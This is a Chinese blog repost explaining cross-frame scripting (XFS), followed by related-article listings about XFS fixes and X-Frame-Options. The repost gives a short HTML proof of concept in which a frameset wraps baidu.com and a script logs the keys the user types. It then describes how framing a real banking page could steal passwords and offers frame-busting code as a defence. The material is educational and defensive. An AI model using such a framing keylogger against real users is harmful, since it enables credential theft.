Cross Frame Script (跨框架脚本) 攻击

最新推荐文章于 2023-06-02 22:16:37 发布
最新推荐文章于 2023-06-02 22:16:37 发布
阅读量376 收藏
点赞数
原文链接:http://www.cnblogs.com/zrp2013/p/3818027.html
版权 
一、Cross Frame Script (跨框架脚本) 攻击
什么是Cross Frame Script?
很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。
<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
   k = window.event.keyCode;
   window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onload="this.focus();" onblur="this.focus();" cols="100%">
 <frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>
当你在百度的搜索框输入字符时,你会发现左下角的状态栏上出现了你输入的字符。
二、Cross Frame Script 原理
利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。
三、Cross Frame Script 危害
一个恶意的站点可以通过用框架包含真的网银或在线支付网站,获取用户账号和密码。
解决方案
用户:留心浏览器地址,不在带框架页面中输入用户信息
网站管理员:
在页面中加入以下javascirpt代码可以避免网站被XFS:
if (top != self)    {
 top.location=self.location;
}

 

转载于:https://www.cnblogs.com/zrp2013/p/3818027.html

weixin_34367257
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cross Frame Scripting
huzk4409的专栏
08-07 1844
有時白箱工具會掃出Client Cross Frame Scripting Attack , 可以在 Header 中加入設定X-FRAME-OPTIONS 但是這樣有些 白箱工具並不知道, 客戶還是會要你改到 Report 看不到, 那怎麼辦呢? 這時候一般會在js中加入 if (top != self) {top.location = self.location;} ...
Cross Frame Script 框架脚本 攻击
qq_43746825的博客
02-22 475
Cross Frame Script 框架脚本 攻击
【常见Web应用安全问题】---6、Script source code disclosure
weixin_34128839的博客
12-22 391
Web应用程序的安全性问题依其存在的形势划分,种类繁多,这里不准备介绍所有的,只介绍常见的一些。  常见Web应用安全问题安全性问题的列表:   1、脚本攻击(CSS or XSS, Cross Site Scripting)   2、SQL注入攻击(SQL injection)   3、远程命令执行(Code execution,个人觉得译成代码执行并不确...
XFS: Cross Frame Script (框架脚本) 攻击
weixin_33736048的博客
01-09 1000
一、Cross Frame Script (框架脚本) 攻击什么是Cross Frame Script?很简单,做个实验就知道了。把下面的这段HTML代码另存为一个html文件,然后用ie浏览器打开。&lt;html&gt;&lt;head&gt;&lt;title&gt;IE Cross Frame Scripting Restriction Bypass Example&lt;/title&...
脚本攻击XSS(Cross Site Script)的原理与常见场景分析
10-18
XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的...这篇文章主要给大家介绍了关于脚本攻击XSS(Cross Site Script)的原理与常见场景的相关资料,需要的朋友可以参考下。
XSS脚本攻击课件
最新发布
11-24
脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本代码到网页中,然后使用户在浏览器中执行这些恶意脚本,从而窃取用户的信息、会话令牌或者执行其他恶意操作。...
jQuery Mobile漏洞会有脚本攻击风险
10-20
人们经常将脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。因此有人将脚本攻击缩写为XSS。
crossframe-pendo:允许Pendo指南框架工作
05-23
框架笔势 注意:此代码现已过时。 最新的Pendo代理原生支持带有针对多个iframe中的元素的步骤的指南。 该库不应再使用,而应使用最新的Pendo代理从任何安装中删除,因为它现在会引起冲突。 该库与标准客户端库...
脚本攻击实例解析
02-17
攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS) 是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料...
域 iframe 实例 (Cross-Domain Javascript execution library)
03-31
NULL 博文链接:https://justcoding.iteye.com/blog/1374728
Cross Frame 与不同域进行交互
03-28
NULL 博文链接:https://mllongze.iteye.com/blog/1234987
安全检测,第三方劫持,SQL盲注等(vue3项目举例)
qq_42264793的博客
12-13 313
安全检测,第三方劫持,SQL盲注等 安全检测 常见Web应用安全问题: 1、脚本攻击(CSS or XSS, Cross Site Scripting) 2、SQL注入攻击(SQL injection) 3、远程命令执行(Code execution,个人觉得译成代码执行并不确切) 4、目录遍历(Directory traversal) 5、文件包含(File inclusion) 6、脚本代码暴露(Script source code disclosure) 7、Http请求头的额外的回车换行符注入(
Cross-Frame Scripting漏洞解决---当你这个漏洞解决不了时,不妨看一下
better1166的博客
09-15 1563
使用HP webInspect进行漏洞扫描时,总是出现Cross-Frame Scripting这个漏洞,经过一次次的扫描测试,终于发现解决办法: (1)漏洞扫描报告关于设置X-FRAME-OPTIONS的方法,由于自己用的不是正式的webInspect版本,即使不设置这个,后台扫描时也不会出现这个漏洞,个人觉得这个方法并不是针对所有的扫描设备都管用,但是遇到的时候测试一下,说不定就好了呢; (2)在页面初始化时加上 if(top != self) { ...
Cross-Frame Scripting 漏洞解决
CutelittleBo的博客
01-24 956
设置 nginx 添加以下指令到 http, server 或 location 中 add_header X-Frame-Options SAMEORIGIN; 参考:https://developer.mozilla.org/zh-TW/docs/Web/HTTP/Headers/X-Frame-Options
XFS框架脚本漏洞介绍
发哥微课堂
09-18 1051
※ 介绍※ XFS即Cross-FrameScripting框架脚本,也叫iFrame注入,了解XFS问题前先来看下面这个小例子,有如下一段html代码。 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <script&g...
.NET框架脚本(XFS)漏洞解决方案
Teemo_2016的博客
07-23 1148
框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTML iframe 标记内加载易受攻击的应用程序。攻击者可以使用此漏洞设计点击劫持攻击,以实施钓鱼式攻击框架探查攻击、社会工程攻击站点请求伪造攻击。 点击劫持攻击的目的是欺骗受害用户在不了解的目标网站上与攻击者选择的 UI 元素交互,然后反过来代表受害者执行特权功能。为达到这一目的,攻击者必须攻击 XFS 漏洞以在 iframe 标记内...
IFrame安全问题解决办法(框架脚本(XFS)漏洞)
热门推荐
Jafey的博客
10-20 1万+
本文记录了本人在项目遇见并解决框架脚本(XFS)漏洞的办法。
iframe框架脚本攻击,安全问题解决办法
一瓢西湖水的博客
06-02 983
框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTMLiframe 标记内加载易受攻击的应用程序。攻击者可以使用此漏洞设计点击劫持攻击,以实施钓鱼式攻击框架探查攻击、社会工程攻击站点请求伪造攻击。个人理解就是其他网站会在他的iframe中调用我的网站内容,来截取他人的点击事件或者窃取他人敏感信息。
springboot脚本攻击
09-01
Spring Boot本身并不提供专门的脚本攻击(Cross-Site Scripting,XSS)防护功能但它提供了一些安全性相关的功能和配置选项,可以帮助我们减少XSS攻击的风险。 以下是一些常用的方法来防止Spring Boot应用程序中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值